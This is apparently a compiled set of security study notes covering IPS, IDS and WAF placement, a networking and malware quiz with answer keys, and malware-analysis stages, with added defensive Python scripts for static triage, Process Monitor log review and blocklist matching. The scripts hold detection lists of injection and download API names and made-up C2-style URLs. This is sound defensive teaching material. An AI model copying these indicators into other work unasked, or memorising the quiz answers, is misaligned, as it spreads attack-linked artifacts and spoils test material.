An IPS (Intrusion Prevention System) has to be able to block traffic, which is why it is connected in line with the packet flow. In the source's topology diagram (Firewall with IPS, not reproduced here), the IPS device is placed behind the firewall, in-line on the communication path that carries packets to and from the internal network.

Usually, an IPS is signature-based which means that it has a database of known malicious traffic, attacks, and exploits and if it sees packets matching a signature then it blocks the traffic flow.
an IPS can work with statistical anomaly detection, rules set by the administrator, etc.

An IDS (Intrusion Detection System) is the predecessor of the IPS and is passive in nature. In the source's diagram (Firewall with IDS, not reproduced here), this device is not inserted in-line with the traffic but sits in parallel (placed out-of-band).

Traffic passing through the switch is also sent at the same time to the IDS for inspection. If a security anomaly is detected in the network traffic, the IDS will just raise an alarm (to the administrator) but it will not be able to block the traffic
Similar to IPS, the IDS device also uses mostly signatures of known security attacks and exploits in order to detect an intrusion attempt.
In order to send traffic to the IDS, the switch device must have a SPAN port configured in order to copy traffic and send it towards the IDS node.

Some IDS deployments can react indirectly: for example, the IDS sends a command to the firewall to block specific traffic when it detects an attack, although the packets that triggered the alert have already passed.

Since most websites nowadays use TLS (HTTPS), a WAF can also provide TLS offload (acceleration) and inspection by terminating the TLS session on the WAF and inspecting the decrypted traffic there.
In the source's diagram (Firewall with WAF, not reproduced here), the WAF is placed in front of a website, usually in a DMZ zone of the firewall.

https://forum.huawei.com/enterprise/en/comparison-and-differences-between-ips-vs-ids-vs-firewall-vs-waf/thread/763619-867

Which of these protocols is a connection-oriented protocol? The Correct Answer is:- D

  • A) FTP
  • B) UDP
  • C) POP3
  • D) TCP 

What port range is an obscure third-party application most likely to use? The Correct Answer is:- D

  • A) 1 to 1024
  • B) 1025 to 32767
  • C) 32768 to 49151
  • D) 49152 to 65535 

 Which category of firewall filters is based on packet header data only? The Correct Answer is:- C

  • A) Stateful
  • B) Application
  • C) Packet
  • D) Proxy 

At which layer of the OSI model does a proxy operate? The Correct Answer is:- D

  • A) Physical
  • B) Network
  • C) Data Link
  • D) Application 

Which technology allows the use of a single public address to support many internal clients while also preventing exposure of internal IP addresses to the outside world? The Correct Answer is:- D

  • A) VPN
  • B) Tunneling
  • C) NTP
  • D) NAT 

 What item is also referred to as a logical address to a computer system? The Correct Answer is:- A

  • A) IP address
  • B) IPX address
  • C) MAC address
  • D) SMAC address 

Which of the following is commonly used to create thumbprints for digital certificates? The Correct Answer is:- A (this quiz answer is dated: certificate viewers today show SHA-1 and SHA-256 fingerprints, and MD5 should not be relied on for this purpose)

  • A) MD5
  • B) MD7
  • C) SHA12
  • D) SHA8 

Which of the following creates a fixed-length output from a variable-length input? The Correct Answer is:- A

  • A) MD5
  • B) MD7
  • C) SHA12
  • D) SHA8 

What encryption process uses one piece of information as a carrier for another? The Correct Answer is:- A

  • A) Steganography
  • B) Hashing
  • C) MDA
  • D) Cryptointelligence 

Which of the following is a major security problem with FTP? The Correct Answer is:- C

  • A) Password files are stored in an unsecure area on disk.
  • B) Memory traces can corrupt file access.
  • C) User IDs and passwords are unencrypted.
  • D) FTP sites are unregistered. 

What type of program exists primarily to propagate and spread itself to other systems and can do so without interaction from users? The Correct Answer is:- D

  • A) Virus
  • B) Trojan horse
  • C) Logic bomb
  • D) Worm  

Which mechanism is used by PKI to allow immediate verification of a certificate’s validity? The Correct Answer is:- D

  • A) CRL
  • B) MD5
  • C) SSHA
  • D) OCSP  

Which statement(s) defines malware most accurately? The Correct Answer is:- B,C

  • A) Malware is a form of virus.
  • B) Trojans are malware.
  • C) Malware covers all malicious software.
  • D) Malware only covers spyware. 

 Which is/are a characteristic of a virus? (no answer given in the source)

  • A) A virus is malware.
  • B) A virus replicates on its own.
  • C) A virus replicates with user interaction.
  • D) A virus is an item that runs silently.

A polymorphic virus __________. The Correct Answer is:- C

  • A) Evades detection through backdoors
  • B) Evades detection through heuristics
  • C) Evades detection through rewriting itself
  • D) Evades detection through luck 

A sparse infector virus __________. The Correct Answer is:- C

  • A) Creates backdoors
  • B) Infects data and executables
  • C) Infects files selectively
  • D) Rewrites itself 
How do you protect the data link layer (Layer 2 of the OSI model)?
Encryption of frames, e.g. MACsec (IEEE 802.1AE) on wired links; on Wi-Fi, WPA2/WPA3 encrypt at this layer.
What security controls can you implement at Layer 7 (Application) of the OSI model?
WAFs, proxies, content delivery networks (CDNs) with their edge filtering.
What protocols are used at the transport layer of the OSI model?
TCP and UDP.
SNMP is a Layer 7 (Application) protocol.
ICMP is a Layer 3 (Network) protocol.


malware analysis

  •  What is Malware Analysis?


Malware analysis is the process of understanding the behavior and purpose of a suspicious file or URL. The output of the analysis aids in the detection and mitigation of the potential threat



    Pragmatically triage incidents by level of severity

    Uncover hidden indicators of compromise (IOCs) that should be blocked

    Improve the efficacy of IOC alerts and notifications

    Enrich context when threat hunting


Types of Malware Analysis


Static Analysis


Basic static analysis does not require that the code is actually run. Instead, static analysis examines the file for signs of malicious intent. It can be useful to identify malicious infrastructure, libraries or packed files.


Technical indicators such as file names, hashes, strings (IP addresses, domains, URLs) and file header data are identified and can be used to determine whether the file is malicious.


tools like disassemblers and network analyzers can be used to observe the malware without actually running it in order to collect information on how the malware works.


since static analysis does not actually run the code, sophisticated malware can include malicious runtime behavior that can go undetected.

For example, if a file generates a string that then downloads a malicious file based upon the dynamic string, it could go undetected by a basic static analysis. 


Dynamic Analysis

Dynamic malware analysis executes  suspected malicious code in a safe environment called a sandbox

This closed system enables security professionals to watch the malware in action without the risk of letting it infect their system or escape into the enterprise network.

Dynamic analysis provides threat hunters and incident responders with deeper visibility, allowing them to uncover the true nature of a threat. 

As a secondary benefit, automated sandboxing eliminates the time it would take to reverse engineer a file to discover the malicious code.


The challenge with dynamic analysis is that adversaries know sandboxes are out there and have become good at detecting them. To deceive a sandbox, malware may stay dormant until certain conditions are met (a real user interacting, a specific locale, a time delay, the absence of analysis tools); only then does the malicious code run.


Hybrid Analysis (includes both of the techniques above)


For example, hybrid analysis applies static analysis to data generated by behavioural analysis, such as the changes a piece of malicious code makes in memory when it runs. Dynamic analysis detects that, and analysts circle back and perform static analysis on the memory dump. As a result, more IOCs are generated, including for unpacked code that never appears on disk in that form.


Malware Analysis Use Cases


Malware Detection

By providing deep behavioral analysis and by identifying shared code, malicious functionality or infrastructure, threats can be more effectively detected.

In addition, an output of malware analysis is the extraction of IOCs. The IOCs may then be fed into SIEMs, threat intelligence platforms (TIPs) and security orchestration tools to aid in alerting teams to related threats in the future.


Threat Alerts and Triage

Malware analysis solutions provide higher-fidelity alerts earlier in the attack life cycle. Therefore, teams can save time by prioritizing the results of these alerts over other technologies.


Incident Response

The goal of the incident response (IR) team is to provide root cause analysis, determine impact and succeed in remediation and recovery. The malware analysis process aids in the efficiency and effectiveness of this effort.


Threat Hunting

Malware analysis can expose behavior and artifacts that threat hunters can use to find similar activity, such as access to a particular network connection, port or domain. By searching firewall and proxy logs or SIEM data, teams can use this data to find similar  threats.


Stages of Malware Analysis


Static Properties Analysis

Static properties include strings embedded in the malware code, header details, hashes, metadata, embedded resources, etc. This type of data may be all that is needed to create IOCs, and they can be acquired very quickly because there is no need to run the program in order to see them.
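The static properties stage as described here and in the SANS list below, as an added example that is not part of the CrowdStrike or SANS articles: hashes, printable strings and indicator extraction (URLs, IPv4 addresses, suspicious Windows API names) from a file image, with an MZ-header check. The `SAMPLE` bytes are a constructed stand-in for a binary (an MZ/PE stub with a few strings embedded), and the `SUSPICIOUS_APIS` list is a small hand-picked set for the demo.

```python
"""Static properties triage of a file image: hashes, strings, indicator extraction (added example)."""
import hashlib
import re

# Constructed sample "binary": MZ stub, PE signature, filler and a few embedded strings. Not real malware.
SAMPLE = (b"MZ" + b"\x90" * 62 + b"PE\x00\x00" + b"\x00" * 40
          + b"kernel32.dll\x00CreateRemoteThread\x00"
          + b"http://203.0.113.7/update.bin\x00"
          + b"\x01\x02\x03" + b"Mozilla/5.0\x00" + b"\xff" * 20)

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
URL = re.compile(r"https?://[^\s\"'<>]+")
# Hand-picked API names often seen in injection/download/execution code (demo list, not exhaustive).
SUSPICIOUS_APIS = {"CreateRemoteThread", "VirtualAllocEx", "WriteProcessMemory",
                   "WinExec", "URLDownloadToFileA"}


def file_hashes(data: bytes) -> dict:
    """Exact-match identifiers to look up in threat intel feeds; any one-byte change alters all of them."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}


def extract_strings(data: bytes, min_len: int = 4) -> list:
    """Runs of printable ASCII at least min_len long, like the `strings` utility."""
    return [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def static_properties(data: bytes) -> dict:
    strings = extract_strings(data)
    return {
        "size": len(data),
        "is_pe": data[:2] == b"MZ",          # DOS/PE header magic
        "hashes": file_hashes(data),
        "strings": strings,
        "urls": sorted({u for s in strings for u in URL.findall(s)}),
        "ipv4": sorted({ip for s in strings for ip in IPV4.findall(s)}),
        "suspicious_apis": sorted({s for s in strings if s in SUSPICIOUS_APIS}),
    }


if __name__ == "__main__":
    props = static_properties(SAMPLE)
    for key, value in props.items():
        print(f"{key:16} {value}")
```

The URL and IP are immediately usable IOCs, and `CreateRemoteThread` is a hint to look for process injection in the behavioural stage. A packed sample or one that builds its strings at runtime (the case mentioned under static analysis above) will show little here, which is why this stage only decides where to look next.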


Interactive Behavior Analysis

Behavioral analysis is used to observe and interact with a malware sample running in a lab. Analysts seek to understand the sample’s registry, file system, process and network activities. They may also conduct memory forensics to learn how the malware uses memory. If the analysts suspect that the malware has a certain capability, they can set up a simulation to test their theory.


Fully Automated Analysis


Manual Code Reversing

analysts reverse-engineer code using debuggers, disassemblers, compilers and specialized tools to decode encrypted data, determine the logic behind the malware algorithm  and understand any hidden capabilities that the malware has not yet exhibited. 



https://www.crowdstrike.com/cybersecurity-101/malware/malware-analysis/

  • Understand Where You Currently Fit Into the Malware Analysis Process


    Fully-Automated Analysis: Run (“detonate”) the suspicious file in an automated analysis environment (“sandbox”) to get a report on its activities, such as its interaction with the file system and network.

    Static Properties Analysis: Examine metadata and other details embedded in the file (e.g., strings) without running it, so you can spot the areas you might want to examine more deeply in subsequent steps.

    Interactive Behavior Analysis: Run the file in an isolated laboratory environment, which you fully control, tweaking the lab’s configuration in a series of iterative experiments to study the specimen’s behavior.

    Manual Code Reversing: Examine the code that comprises the file, often with the help of a disassembler and a debugger, to understand its key capabilities and fill in the gaps left from the earlier analysis steps.


Memory, file system, and network forensics efforts (when applicable) also contribute to the understanding.


https://www.sans.org/blog/how-you-can-start-learning-malware-analysis/


  • Intro to Malware Analysis: What It Is & How It Works


There are a few key reasons to perform malware analysis:


    Malware detection — To better protect your organization, you need to be able to identify compromising threats and vulnerabilities.

    Threat response — To help you understand how these threats work so you can react accordingly to them.

    Malware research — This can help you to better understand how specific types of malware work, where they originated, and what differentiates them.


What Is Malware?

Malware is any piece of software that is harmful to your system: worms, viruses, trojans, spyware, etc.

Malware analysis can help you to determine if a suspicious file is indeed malicious, study its origin, process, capabilities, and assess its impact to facilitate detection and prevention.


The Two Types of Malware Analysis Techniques: Static vs. Dynamic


There are two ways to approach the malware analysis process — using static analysis or dynamic analysis. With static analysis, the malware sample is examined without detonating it, whereas, with dynamic analysis, the malware is actually executed in a controlled, isolated environment.



Static Malware Analysis

The malware's components and properties are analyzed without running the code.

Static malware analysis is often signature-based: a cryptographic hash (e.g., MD5 or SHA-256) of the malware binary is computed and used as its fingerprint, which can be looked up in malware repositories and matched against known samples. A hash only matches the exact same file, so a recompiled or repacked variant will have a different hash.

The malware binary can be reverse-engineered by using a disassembler.

Static malware analysis involves virus scanning, fingerprinting (hashing), extracting strings and file metadata, and examining memory dumps captured from a running sample.


Dynamic Malware Analysis

The malware is executed within a virtual environment, and its behavior is observed.

Dynamic malware analysis takes a behavior-based approach to malware detection and analysis.

The malware binary can be reverse-engineered using disassemblers and debuggers to understand and control certain aspects of the program when executing.

Dynamic malware analysis observes registry changes, API calls, memory writes, network traffic, etc.

It generally reveals more than static analysis alone and gives a higher detection rate, but it is not infallible: a sample that detects the virtual environment, or that waits for user interaction, may simply do nothing in the sandbox, so static and dynamic analysis complement each other.


The Four Stages of Malware Analysis


Stage One: Fully Automated Analysis

Fully automated analysis means detonating the sample in a sandbox and letting the tooling produce a report of its file-system, registry, process and network activity; the verdict is based on detection models built from previously analyzed malware samples.

Fully automated analysis can be done using tools like Cuckoo Sandbox, an open-source automated malware analysis platform that can be tweaked to run custom scripts and generate comprehensive reports.


Stage Two: Static Properties Analysis

Static properties analysis involves looking at a file's metadata (hashes, strings, headers, imports) without executing the malware.

One of the free tools that you may find useful for this purpose is PeStudio. This tool flags suspicious artifacts within executable files and is designed for automated static properties analysis. PeStudio presents the file hashes that can be used to search VirusTotal, TotalHash, or other malware repositories to see if the file has previously been analyzed.
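As an added example (not code from the page, from PeStudio or from any other tool it names), the following script performs the static-properties step by hand: it hashes a file for repository lookups, pulls printable ASCII and UTF-16LE strings, reads the COFF and section headers of a PE file, and flags the kind of artifacts PeStudio would highlight (writable and executable sections, sections with no raw data, packer section names, URLs and IPs, debugger-detection and injection API names, named mutexes). The PE image it analyses is constructed inline for the demo: valid headers, no real code; the URL, the mutex name and the API names inside it are made up.

```python
"""Static properties triage: hashes, printable strings and PE header facts.

Added example, not code from the page, PeStudio or any other tool it names.
The PE image below is constructed for the demo: valid headers, no real code.
"""
import hashlib
import re
import struct
from datetime import datetime, timezone

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
COFF_FMT = "<HHIIIHH"            # IMAGE_FILE_HEADER, 20 bytes
SECTION_FMT = "<8sIIIIIIHHI"     # IMAGE_SECTION_HEADER, 40 bytes
# API names common in droppers/injectors; a hit is a lead, not a verdict.
SUSPICIOUS_APIS = {"IsDebuggerPresent", "CreateRemoteThread", "VirtualAllocEx",
                   "WriteProcessMemory", "URLDownloadToFileA", "WinExec"}


def build_sample_pe() -> bytes:
    """Constructed minimal PE: DOS header, COFF header, two sections, a few strings."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew: PE signature at 0x40
    coff = b"PE\0\0" + struct.pack(
        COFF_FMT,
        0x8664,        # Machine: AMD64
        2,             # NumberOfSections
        1593835520,    # TimeDateStamp: 2020-07-04 04:05:20 UTC
        0, 0,          # PointerToSymbolTable, NumberOfSymbols
        0,             # SizeOfOptionalHeader: omitted in this stand-in
        0x0022)        # Characteristics: EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE
    text = struct.pack(SECTION_FMT, b".text", 0x200, 0x1000, 0x200, 0x200,
                       0, 0, 0, 0, 0x60000020)       # CODE | EXECUTE | READ
    upx0 = struct.pack(SECTION_FMT, b"UPX0", 0x10000, 0x2000, 0, 0,
                       0, 0, 0, 0, 0xE0000080)       # UNINIT_DATA | R | W | X
    strings = (b"\x00\x01\x02http://198.51.100.7/gate.php\0IsDebuggerPresent\0"
               b"CreateRemoteThread\0Global\\ExampleMutex\0" + b"\xff" * 16)
    return bytes(dos) + coff + text + upx0 + strings


def parse_pe(data: bytes):
    """Return COFF/section metadata, or None if the bytes are not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from(COFF_FMT, data, e_lfanew + 4)
    sec_off = e_lfanew + 4 + 20 + opt_size           # sections follow the optional header
    sections = []
    for i in range(nsec):
        f = struct.unpack_from(SECTION_FMT, data, sec_off + 40 * i)
        sections.append({"name": f[0].rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": f[1], "raw_size": f[3], "characteristics": f[9]})
    return {"machine": hex(machine), "characteristics": hex(chars),
            "timestamp": datetime.fromtimestamp(stamp, timezone.utc).isoformat(),
            "sections": sections}


def extract_strings(data: bytes, min_len: int = 6):
    """Printable ASCII runs plus UTF-16LE runs (Windows malware stores many strings wide)."""
    ascii_strs = [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]
    wide_strs = [m.decode("utf-16le") for m in re.findall(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data)]
    return ascii_strs + wide_strs


def find_indicators(pe, strings):
    """Artifacts worth a closer look in later stages; each one is a lead, not proof."""
    hits = []
    for s in (pe["sections"] if pe else []):
        c = s["characteristics"]
        if c & IMAGE_SCN_MEM_WRITE and c & IMAGE_SCN_MEM_EXECUTE:
            hits.append(f"section {s['name']} is writable and executable")
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            hits.append(f"section {s['name']} has no raw data but {s['virtual_size']:#x} virtual bytes (unpacks at runtime?)")
        if s["name"].startswith("UPX"):
            hits.append(f"section {s['name']} is named like a UPX packer section")
    for s in strings:
        if re.search(r"https?://|\b(?:\d{1,3}\.){3}\d{1,3}\b", s):
            hits.append(f"network string: {s}")
        if s in SUSPICIOUS_APIS:
            hits.append(f"suspicious API name: {s}")
        if s.startswith(("Global\\", "Local\\")):
            hits.append(f"possible mutex/named object: {s}")
    return hits


def static_properties(data: bytes) -> dict:
    strings = extract_strings(data)
    pe = parse_pe(data)
    return {"size": len(data),
            "md5": hashlib.md5(data).hexdigest(),
            "sha1": hashlib.sha1(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest(),
            "pe": pe, "strings": strings, "indicators": find_indicators(pe, strings)}


if __name__ == "__main__":
    report = static_properties(build_sample_pe())
    print("sha256:", report["sha256"], "(look this up in VirusTotal or another repository)")
    print("compiled:", report["pe"]["timestamp"], "machine:", report["pe"]["machine"])
    for hit in report["indicators"]:
        print(" -", hit)
```

The indicators are deliberately loose: a writable-and-executable section or a UPX name is not malicious in itself, but each is a reason to spend time on the sample in the later stages rather than stop at the hash lookup.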


Stage Three: Interactive Behavior Analysis

The malware sample is executed in isolation while the analyst observes how it interacts with the system and the changes it makes.

Often, a piece of malware might refuse to execute if it detects a virtual environment or might be designed to avoid execution without manual interaction (i.e., in an automated environment)


There are several types of actions that should immediately raise a red flag, including:


    Adding or modifying new or existing files,

    Installing new services or processes, and

    Modifying the registry or changing system settings.


Some types of malware might try to connect to suspicious host IPs that do not belong to the lab environment. Others might also try to create mutex objects to avoid infecting the same host multiple times (to preserve operational stability). These findings are relevant indicators of compromise.


Some of the tools that you can use include:


    Wireshark for observing network packets,

    Process Hacker to observe the processes that are executing in memory,

    Process Monitor to observe real-time file system, registry, process activity for Windows, and

    ProcDot to provide an interactive and graphical representation of all recorded activities.
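The red flags listed above can be checked mechanically against the Process Monitor export from a detonation. As an added example (not code from the page or from Sysinternals), the script below reads Process Monitor CSV lines, classifies file creation, persistence through Run keys and services, process spawning and outbound TCP connections to addresses outside the lab's own networks, and collects the resulting indicators of compromise. The log lines are constructed in the column layout of a Process Monitor CSV export (with network address resolution switched off, so TCP paths carry IP addresses); the file names, registry keys, PIDs and addresses are made up for the demo, and the lab network ranges are an assumption.

```python
"""Triage of a Process Monitor CSV export from an interactive detonation.

Added example, not code from the page or from Sysinternals. The rows below are
constructed in Process Monitor's CSV column layout; names and addresses are made up.
"""
import csv
import io
import ipaddress
import re

PROCMON_CSV = r'''"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:15:01.0001","invoice.exe","4120","CreateFile","C:\Users\analyst\AppData\Roaming\svchost32.exe","SUCCESS","Desired Access: Generic Write, Disposition: Create"
"10:15:01.0002","invoice.exe","4120","WriteFile","C:\Users\analyst\AppData\Roaming\svchost32.exe","SUCCESS","Offset: 0, Length: 245,760"
"10:15:01.0005","invoice.exe","4120","RegSetValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater","SUCCESS","Type: REG_SZ, Length: 88, Data: C:\Users\analyst\AppData\Roaming\svchost32.exe"
"10:15:01.0010","invoice.exe","4120","Process Create","C:\Users\analyst\AppData\Roaming\svchost32.exe","SUCCESS","PID: 4388, Command line: ""C:\Users\analyst\AppData\Roaming\svchost32.exe"" -s"
"10:15:02.0020","svchost32.exe","4388","TCP Connect","lab-win10:49712 -> 198.51.100.7:443","SUCCESS","Length: 0, mss: 1460"
"10:15:02.0030","svchost32.exe","4388","RegSetValue","HKLM\System\CurrentControlSet\Services\UpdSvc\ImagePath","SUCCESS","Type: REG_EXPAND_SZ, Length: 120, Data: C:\Users\analyst\AppData\Roaming\svchost32.exe"
"10:15:03.0000","explorer.exe","1234","RegQueryValue","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden","SUCCESS","Type: REG_DWORD, Length: 4, Data: 1"
"10:15:03.0010","svchost32.exe","4388","TCP Connect","lab-win10:49713 -> 10.0.0.5:80","SUCCESS","Length: 0, mss: 1460"
'''

# Assumed lab ranges: the fake-internet services and analysis hosts live here, so a
# connection anywhere else is an attempt to reach real infrastructure.
LAB_NETWORKS = ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")


def classify(row, lab_nets):
    """Map one Process Monitor row to a (category, process, detail) finding, or None."""
    op, path, detail = row["Operation"], row["Path"], row["Detail"]
    proc = f"{row['Process Name']}({row['PID']})"
    lpath = path.lower()
    if op == "CreateFile" and "Disposition: Create" in detail:
        return ("file_created", proc, path)
    if op == "WriteFile":
        return ("file_written", proc, path)
    if op in ("RegSetValue", "RegCreateKey"):
        if "\\currentcontrolset\\services\\" in lpath:
            return ("service_installed", proc, path)
        if "\\currentversion\\run" in lpath:
            return ("autorun_persistence", proc, path)
        return ("registry_modified", proc, path)
    if op == "Process Create":
        return ("process_spawned", proc, detail)
    if op == "TCP Connect":
        m = re.search(r"-> (\S+):(\d+)$", path)      # "local:port -> remote:port"
        if not m:
            return None
        remote, port = m.group(1), m.group(2)
        try:
            ip = ipaddress.ip_address(remote)
            if any(ip in net for net in lab_nets):
                return None                           # talking to the lab itself
        except ValueError:
            pass                                      # hostname: treat as external
        return ("external_connection", proc, f"{remote}:{port}")
    return None


def triage(csv_text: str, lab_networks=LAB_NETWORKS):
    """Return the red-flag findings from a Process Monitor CSV export, in log order."""
    nets = [ipaddress.ip_network(n) for n in lab_networks]
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        finding = classify(row, nets)
        if finding:
            findings.append(finding)
    return findings


def extract_iocs(findings):
    """Group findings into the indicators you would hand to detection engineering."""
    iocs = {"files": set(), "registry": set(), "network": set()}
    for category, _, what in findings:
        if category.startswith("file_"):
            iocs["files"].add(what)
        elif category in ("autorun_persistence", "service_installed", "registry_modified"):
            iocs["registry"].add(what)
        elif category == "external_connection":
            iocs["network"].add(what)
    return {k: sorted(v) for k, v in iocs.items()}


if __name__ == "__main__":
    found = triage(PROCMON_CSV)
    for category, proc, what in found:
        print(f"{category:22} {proc:20} {what}")
    print(extract_iocs(found))
```

Note that the benign `explorer.exe` registry read and the connection to the lab's own 10.0.0.5 produce no findings: the value of the rules is in what they leave out as much as what they flag, since a full Process Monitor capture contains thousands of harmless events.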



Stage Four: Manual Code Reversing


This process can:


    Shed some light on the logic and algorithms the malware uses,

    Expose hidden capabilities and exploitation techniques the malware uses, and

    Provide insights about the communication protocol between the implant and its command-and-control (C2) server.


Typically, to manually reverse the code, analysts make use of debuggers and disassemblers. 


How to Prevent Malware Infection


Keep your systems and applications up to date.

Stay wary of social engineering attacks that can compromise your data.

Perform regular scans on your systems using antivirus, anti-malware solutions

Employ security best practices like using a secure connection, blocking ads, etc. 

Create backups for all your business-critical data.

https://sectigostore.com/blog/malware-analysis-what-it-is-how-it-works/


  • Free Automated Malware Analysis Sandboxes and Services

Automated malware analysis tools, such as analysis sandboxes, save time and help with triage during incident response and forensic investigations.

https://zeltser.com/automated-malware-analysis/



  • Free Blocklists of Suspected Malicious IPs and URLs

Several organizations maintain and publish free blocklists of IP addresses and URLs of systems and networks suspected of malicious activity online.

https://zeltser.com/malicious-ip-blocklists/
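Such feeds are most useful when the indicators from a sandbox run are checked against them automatically. As an added example (not code from the page or from any of the feed providers), the script below parses a blocklist in the plain-text shape most feeds use (one entry per line, `#` comments, a mix of single IPs, CIDR ranges, domains and URLs) and matches observed indicators against it, handling the three cases a naive string comparison misses: an IP inside a listed range, a subdomain of a listed domain, and a URL under a listed path. The feed contents and the indicators are constructed for the demo using documentation address ranges and `.example` names.

```python
"""Matching sandbox indicators against a plain-text blocklist feed.

Added example, not code from the page or from any feed provider. The feed and
the indicators are constructed (documentation IP ranges, .example domains).
"""
import ipaddress
from urllib.parse import urlparse

BLOCKLIST_TEXT = """# constructed blocklist, not a real feed
# one entry per line: IP, CIDR range, domain, or URL prefix
198.51.100.7
203.0.113.0/24          # whole range listed
evil-updates.example    # covers subdomains too
http://bad.example/loader/
"""

# Indicators as they might come out of a sandbox report (constructed).
OBSERVED = ["198.51.100.7", "203.0.113.44", "cdn.evil-updates.example",
            "http://bad.example/loader/stage2.bin", "10.0.0.5", "https://www.example.org/"]


class Blocklist:
    def __init__(self, text: str):
        self.ips, self.nets, self.domains, self.urls = set(), [], set(), set()
        for raw in text.splitlines():
            line = raw.split("#", 1)[0].strip()     # strip comments (URLs with fragments lose them)
            if not line:
                continue
            if "://" in line:
                self.urls.add(line)
                continue
            try:
                if "/" in line:
                    self.nets.append(ipaddress.ip_network(line, strict=False))
                else:
                    self.ips.add(ipaddress.ip_address(line))
                continue
            except ValueError:
                pass                                 # not an address: treat as a domain
            self.domains.add(line.lower().rstrip("."))

    def match_ip(self, ip_str: str):
        """Exact IP hit or containing range; raises ValueError for non-addresses."""
        ip = ipaddress.ip_address(ip_str)
        if ip in self.ips:
            return f"ip {ip}"
        for net in self.nets:
            if ip in net:
                return f"net {net}"
        return None

    def match_host(self, host: str):
        """A listed domain covers the domain itself and every subdomain."""
        labels = host.lower().rstrip(".").split(".")
        for i in range(len(labels)):
            suffix = ".".join(labels[i:])
            if suffix in self.domains:
                return f"domain {suffix}"
        return None

    def match_url(self, url: str):
        """Check the host first (IP or domain), then listed URL prefixes."""
        parts = urlparse(url)
        host = parts.hostname or ""
        try:
            hit = self.match_ip(host)
        except ValueError:
            hit = self.match_host(host)
        if hit:
            return hit
        norm = f"{parts.scheme}://{host}{parts.path}"
        for listed in self.urls:
            base = listed.rstrip("/")
            if norm == base or norm.startswith(base + "/"):
                return f"url {listed}"
        return None


def check_indicators(blocklist: Blocklist, indicators):
    """Return {indicator: matching entry or None} for a mixed list of IPs, hosts, URLs."""
    results = {}
    for ioc in indicators:
        if "://" in ioc:
            hit = blocklist.match_url(ioc)
        else:
            try:
                hit = blocklist.match_ip(ioc)
            except ValueError:
                hit = blocklist.match_host(ioc)
        results[ioc] = hit
    return results


if __name__ == "__main__":
    for ioc, hit in check_indicators(Blocklist(BLOCKLIST_TEXT), OBSERVED).items():
        print(f"{ioc:40} {hit or '-'}")
```

A hit means the indicator is on a list of suspected bad infrastructure, not that the sample is confirmed malicious; the lists also age, so keep the feed's retrieval date with the match when you record it.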


  • Free Online Tools for Looking up Potentially Malicious Websites

Several organizations offer free online tools for looking up a potentially malicious website. Some of these tools provide historical information; others examine the URL in real time to identify threats.

https://zeltser.com/lookup-malicious-websites/






What about malware variants that have not yet been seen? Signature-based detection methods will not work against them. To detect these threats, vendors created sandboxing products, which take a suspect file and place it in an environment where its behaviour can be closely analysed. If the file does something malicious while in the sandbox, it is flagged as malware. This is known as heuristic (behaviour-based) detection: it looks for anomalous behaviour that is out of the ordinary rather than for a known signature. Vendors build proprietary heuristic algorithms that can detect never-before-seen polymorphic samples of malware.


https://training.fortinet.com/pluginfile.php/1624915/mod_scorm/content/1/story_content/external_files/NSE%202%20TIS%20Script_EN.pdf